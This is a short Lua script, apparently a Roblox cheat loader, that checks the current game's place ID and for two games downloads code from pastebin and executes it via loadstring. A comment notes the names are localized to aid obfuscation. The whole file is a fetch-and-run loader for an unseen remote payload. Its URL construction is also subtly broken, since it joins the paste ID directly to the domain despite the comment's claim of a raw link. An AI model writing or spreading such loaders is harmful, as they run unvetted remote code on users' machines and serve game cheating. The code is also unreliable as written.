--// Configuration
local _P = game.PlaceId
local _I = "A8V7zx89" -- Iron Man
local _T = "SH80r9gk" -- TSB

--// Localizing functions (helps with obfuscation & speed)
local _G = game
local _H = _G.HttpGet
local _L = loadstring
local _W = warn

local function _E(_ID)
    -- Using the raw link for direct access
    local _U = "https://pastebin.com" .. _ID
    local _S, _C = pcall(function()
        return _H(_G, _U)
    end)

    if _S and _C then
        local _F, _ERR = _L(_C)
        if _F then
            _F()
        else
            _W("Load Error: " .. tostring(_ERR))
        end
    else
        _W("Fetch Error")
    end
end

--// Logic
if _P == 16929212566 then
    _E(_I)
elseif _P == 10449761463 then
    _E(_T)
end
